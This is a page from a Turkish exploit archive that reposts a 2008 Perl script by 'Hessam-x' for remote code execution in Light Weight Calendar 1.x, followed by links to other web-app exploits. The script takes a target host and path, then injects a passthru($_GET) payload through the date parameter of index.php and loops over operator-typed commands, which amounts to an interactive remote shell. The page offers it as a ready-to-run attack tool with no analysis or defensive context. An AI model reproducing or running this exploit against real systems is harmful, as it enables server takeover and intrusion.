Full-TR - Light Weight Calendar 1.x (date) Remote Code Execution Vulnerability

Exploit / Web Apps Exploit / Light Weight Calendar 1.x (date) Remote Code Execution Vulnerability

Eklenme Tarihi: 2008-10-20 23:04

#!/usr/bin/perl
#
# Light Weight Calendar
# Exploit by Hessam-x (www.hessamx.net)
#
######################################################
# ___ ___ __ #
# / | \_____ ____ | | __ ___________________ #
#/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / #
#\ Y // __ \\ \___| <\ ___/| | \// / #
# \___|_ /(____ /\___ >__|_ \\___ >__| /_____ \ #
# \/ \/ \/ \/ \/ \/ #
# Iran Hackerz Security Team #
# WebSite: www.hackerz.ir #
# #
######################################################
# Name : Light Weight Calendar #
# version : 1.* #
######################################################
use LWP::Simple;

print "-------------------------------------------\n";
print "= Light Weight Calendar =\n";
print "= By Hessam-x - www.hackerz.ir =\n";
print "-------------------------------------------\n\n";

print "Target(www.example.com)\> ";
chomp($targ = <STDIN>);

print "path: (/lwc/)\>";
chomp($path=<STDIN>);

while()
{

print "command:\>";
chomp($comd=<STDIN>);
$expl="index.php?hx=".$comd."&date=passthru%28%24_GET%5Bhx%5D%29";
$page=get("http://".$targ.$path.$expl) || die "[-] Exploit failed ...\n";

}

Yorumlar:

Hen�z Yorum Eklenmedi

Yorum Ekle

Keywords:

Benzer Sayfalar (Similar Pages):

Bulunamad�. (not found)

Bu Sayfalarda �lginizi �ekebilir (The Links Bellow May Attract You As Well):

Exploit / Web Apps Exploit / WordPress Blog HTTP Splitting Vulnerability
Exploit / Web Apps Exploit / Turbo Seek Null Byte Error Discloses Files to Remote Users
Exploit / Web Apps Exploit / PHP-Nuke 7.4 Remote Privilege Escalation
Exploit / Web Apps Exploit / PHP-NUKE version <= 6.9 'cid' sql injection Remote Exploit
Exploit / Web Apps Exploit / phpBB 2.0.6 search_id sql injection MD5 Hash Remote Exploit
Exploit / Web Apps Exploit / Fastgraf's whois.cgi Remote Command Execution Exploit
Exploit / Web Apps Exploit / ListMail v112 - Command Execution
Exploit / Web Apps Exploit / PostNuke PostWrap Module Remote Exploit
Exploit / Web Apps Exploit / Siteman <= 1.1.10 Remote Administrative Account Addition Exploit
Exploit / Web Apps Exploit / AWStats configdir Remote Command Execution Exploit (perl code)
Exploit / Web Apps Exploit / QWikiwiki Directory Traversal Vulnerability
Exploit / Web Apps Exploit / e107 include() Remote Exploit
Exploit / Web Apps Exploit / phpMyChat 0.14.5 Remote Improper File Permissions Exploit
Exploit / Web Apps Exploit / phpBB highlight Arbitrary File Upload (Santy.A)
Exploit / Web Apps Exploit / phpBB <= 2.0.10 Remote Command Execution Exploit (cgi version)
Exploit / Web Apps Exploit / phpBB <= 2.0.10 Remote Command Execution Exploit
Exploit / Web Apps Exploit / GFHost PHP GMail Remote Command Execution Exploit
Exploit / Web Apps Exploit / TWiki 20030201 search.pm Remote Command Execution Exploit
Exploit / Web Apps Exploit / vBulletin LAST.PHP SQL Injection Vulnerability
Exploit / Web Apps Exploit / ocPortal 1.0.3 Remote File Inclusion
Exploit / Web Apps Exploit / The Includer CGI <= 1.0 Remote Command Execution (new version2)
Exploit / Web Apps Exploit / The Includer CGI <= 1.0 Remote Command Execution (new version)
Exploit / Web Apps Exploit / PHP-Nuke 6.x - 7.6 Top module Remote Sql Injection Exploit (working)
Exploit / Web Apps Exploit / phpBB <= 2.0.13 'Calendar Pro' mod Remote Exploit
Exploit / Web Apps Exploit / phpBB <= 2.0.13 'downloads.php' mod Remote Exploit
Exploit / Web Apps Exploit / ZPanel <= 2.5 Remote SQL Injection Exploit
Exploit / Web Apps Exploit / phpDEV5 Remote Default Insecure Users Vuln
Exploit / Web Apps Exploit / Download Center Lite (DCL) <= 1.5 Remote File Inclusion
Exploit / Web Apps Exploit / PHP mcNews <= 1.3 (skinfile) Remote File Include Vulnerability
Exploit / Web Apps Exploit / The Includer CGI <= 1.0 Remote Command Execution